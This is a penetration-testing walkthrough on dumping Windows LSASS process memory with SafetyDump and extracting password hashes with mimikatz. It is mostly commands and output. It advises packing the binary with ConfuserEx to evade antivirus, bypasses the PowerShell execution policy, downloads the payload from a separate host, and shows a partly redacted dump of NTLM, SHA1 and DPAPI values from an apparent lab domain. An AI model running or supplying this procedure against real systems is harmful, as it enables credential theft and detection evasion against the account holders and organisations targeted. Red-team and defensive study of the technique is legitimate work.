==================================================================================================================================
OS Credential Dumping (LSASS) using 'SafetyDump'
==================================================================================================================================

After a user logs on a Windows computer, the system generates and stores a variety of credential materials in LSASS process memory. 
Our objective is to extract the password hashes of the local and/or domain accounts stored in the memory of the Local Security 
Authority Subsystem Service (LSASS process) of a target Windows computer. 
A valid local or domain Windows account member of the 'local administrator' group is required for dumping the LSASS process.

> Usefull link: https://attack.mitre.org/techniques/T1003/001/

SafetyDump is an in-memory process memory dumper.
It uses the Minidump Windows API to dump process memory before base64 encoding that dump and writing it to standard output. 
This allows the dump to be redirected to a file or straight back down to a C2 or through other tools.
Note as everything takes place in memory this can be memory intensive while the dumping is taking place.

=> Github: https://github.com/m0rv4i/SafetyDump

Important note regarding AV detection
--------------------------------------
=> The "SafteyDump.exe" binary's signature was not detected by Windows Defender during my tests but it is better to pack it anyway.


=====================================================================================================================================
Example/PoC - Use 'SafteyDump' to dump the LSASS process memory of a Windows 10 laptop and then 'Mimikatz.exe' to extract the hashes
=====================================================================================================================================

-----------------------------------------------------------------------------------------------------------
Step 1. Download the tool's source code, compile it and pack it
-----------------------------------------------------------------------------------------------------------

=> Github link: https://github.com/m0rv4i/SafetyDump

Packing the tool with Confuser-EX
----------------------------------
 [INFO] Confuser.Core 1.6.0+447341964f Copyright © 2014 Ki, 2018 - 2022 Martin Karing
 [INFO] Running on Microsoft Windows NT 6.2.9200.0, .NET Framework v4.0.30319.42000, 64 bits
[DEBUG] Discovering plugins...
 [INFO] Discovered 13 protections, 1 packers.
[DEBUG] Resolving component dependency...
 [INFO] Loading input modules...
 [INFO] Loading 'SafetyDump.exe'...
 [INFO] Initializing...
[DEBUG] Building pipeline...
[DEBUG] Executing 'Type scanner' phase...
 [INFO] Resolving dependencies...
[DEBUG] Checking Strong Name...
[DEBUG] Creating global .cctors...
[DEBUG] Executing 'Name analysis' phase...
[DEBUG] Building VTables & identifier list...
[DEBUG] Analyzing...
 [INFO] Processing module 'SafetyDump.exe'...
[DEBUG] Executing 'Invalid metadata addition' phase...
[DEBUG] Executing 'Renaming' phase...
[DEBUG] Renaming...
[DEBUG] Executing 'Anti-tamper module writer preparation' phase...
[DEBUG] Executing 'Anti-debug injection' phase...
[DEBUG] Executing 'Anti-dump injection' phase...
[DEBUG] Executing 'Anti-ILDasm marking' phase...
[DEBUG] Executing 'Encoding reference proxies' phase...
[DEBUG] Executing 'Constant encryption helpers injection' phase...
[DEBUG] Executing 'Resource encryption helpers injection' phase...
[DEBUG] Executing 'Type scrambler' phase...
[DEBUG] Executing 'Constants encoding' phase...
[DEBUG] Executing 'Hardening Phase' phase...
[DEBUG] Executing 'Anti-tamper helpers injection' phase...
[DEBUG] Executing 'Control flow mangling' phase...
[DEBUG] Executing 'Post-renaming' phase...
[DEBUG] Executing 'Anti-tamper metadata preparation' phase...
[DEBUG] Executing 'Apply watermark' phase...
[DEBUG] Watermarking...
[DEBUG] Executing 'Packer info extraction' phase...
 [INFO] Writing module 'koi'...
[DEBUG] Encrypting resources...
 [INFO] Finalizing...
 [INFO] Packing...
[DEBUG] Encrypting modules...
 [INFO] Protecting packer stub...
[DEBUG] Discovering plugins...
 [INFO] Discovered 14 protections, 1 packers.
[DEBUG] Resolving component dependency...
 [INFO] Loading input modules...
 [INFO] Loading 'SafetyDump.exe'...
 [INFO] Initializing...
[DEBUG] Building pipeline...
[DEBUG] Executing 'Type scanner' phase...
[DEBUG] Executing 'Module injection' phase...
 [INFO] Resolving dependencies...
[DEBUG] Checking Strong Name...
[DEBUG] Creating global .cctors...
[DEBUG] Executing 'Name analysis' phase...
[DEBUG] Building VTables & identifier list...
[DEBUG] Analyzing...
 [INFO] Processing module 'SafetyDump.exe'...
[DEBUG] Executing 'Packer info encoding' phase...
[DEBUG] Executing 'Invalid metadata addition' phase...
[DEBUG] Executing 'Renaming' phase...
[DEBUG] Renaming...
[DEBUG] Executing 'Anti-tamper module writer preparation' phase...
[DEBUG] Executing 'Anti-debug injection' phase...
[DEBUG] Executing 'Anti-dump injection' phase...
[DEBUG] Executing 'Anti-ILDasm marking' phase...
[DEBUG] Executing 'Encoding reference proxies' phase...
[DEBUG] Executing 'Constant encryption helpers injection' phase...
[DEBUG] Executing 'Resource encryption helpers injection' phase...
[DEBUG] Executing 'Type scrambler' phase...
[DEBUG] Executing 'Constants encoding' phase...
[DEBUG] Executing 'Hardening Phase' phase...
[DEBUG] Executing 'Anti-tamper helpers injection' phase...
[DEBUG] Executing 'Control flow mangling' phase...
[DEBUG] Executing 'Post-renaming' phase...
[DEBUG] Executing 'Anti-tamper metadata preparation' phase...
[DEBUG] Executing 'Apply watermark' phase...
[DEBUG] Watermarking...
[DEBUG] Executing 'Packer info extraction' phase...
 [INFO] Writing module 'SafetyDump.exe'...
 [INFO] Finalizing...
[DEBUG] Saving to 'C:\Users\pentester\AppData\Local\Temp\xud4a22q.0lc\ue1h0dga.sco\SafetyDump.exe'...
[DEBUG] Executing 'Export symbol map' phase...
 [INFO] Finish protecting packer stub.
[DEBUG] Saving to 'C:\Users\pentester\Documents\Tools-Pentest\7-Password-Dump&Cracking\SafetyDump-master\SafetyDump\bin\Release\Confused\SafetyDump.exe'...
[DEBUG] Executing 'Export symbol map' phase...
 [INFO] Done.
Finished at 10:59 AM, 0:01 elapsed.


--------------------------------------------------------------------------------------------------------------------------
Step 2 - Upload the packed version of SafetyDump on a target Windows laptop & execute it to dump the LSASS process memory
--------------------------------------------------------------------------------------------------------------------------

C:\Temp>powershell -exec bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Temp> wget -URI http://192.168.1.34:8080/PackedSafetyDump.exe -OutFile PackedSafetyDump.exe

PS C:\Temp> exit

C:\Temp> 
C:\Temp> PackedSafetyDump.exe > memdmp.txt

C:\Temp>dir memdmp.txt
 Volume in drive C is Windows
 Volume Serial Number is F06E-DC58

 Directory of C:\Temp

04/05/2023  11:02 AM        83,886,080 memdmp.txt
               1 File(s)     83,886,080 bytes
               0 Dir(s)  163,666,108,416 bytes free
               
               
--------------------------------------------------------------------------------------------------------------------------
Step 3 - Download the lssas dump "base64" file & then extract the credentials with the tool Mimikatz 
--------------------------------------------------------------------------------------------------------------------------

C:\Users\pentester\Documents\Tools-Pentest\7-Password-Dump&Cracking\mimikatz_trunk_last\x64> certutil -decode memdmp.txt > C:\Temp\memdmp.raw

C:\Users\pentester\Documents\Tools-Pentest\7-Password-Dump&Cracking\mimikatz_trunk_last\x64> mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/


mimikatz # sekurlsa::minidump C:\Temp\memdmp.raw
Switch to MINIDUMP : 'C:\Temp\memdmp.raw'

mimikatz # sekurlsa::LogonPasswords
Opening : 'C:\Temp\memdmp.raw' file for minidump...

Authentication Id : 0 ; 910165 (00000000:000de355)
Session           : Interactive from 1
User Name         : pentester
Domain            : LAB
Logon Server      : DC2
Logon Time        : 4/5/2023 10:47:56 AM
SID               : S-1-5-21-666114207-261065646-22415<SNIP>
        msv :
         [00000003] Primary
         * Username : pentester
         * Domain   : LAB
         * NTLM     : 85a931e082c05f58bd<SNIP>
         * SHA1     : 3312401ebc36e00368<SNIP>
         * DPAPI    : bba5a02d57ddbc4638<SNIP>
        tspkg :
         * Username : pentester
         * Domain   : LAB
         * Password : <SNIP>
        wdigest :
         * Username : pentester
         * Domain   : LAB
         * Password : (null)
        kerberos :
         * Username : pentester
         * Domain   : LAB.INTRAXA
         * Password : (null)
        ssp :
        credman :
         [00000000]
         * Username : cmd
         * Domain   : 192.168.1.52
         * Password : (null)
        cloudap :   
<SNIP>

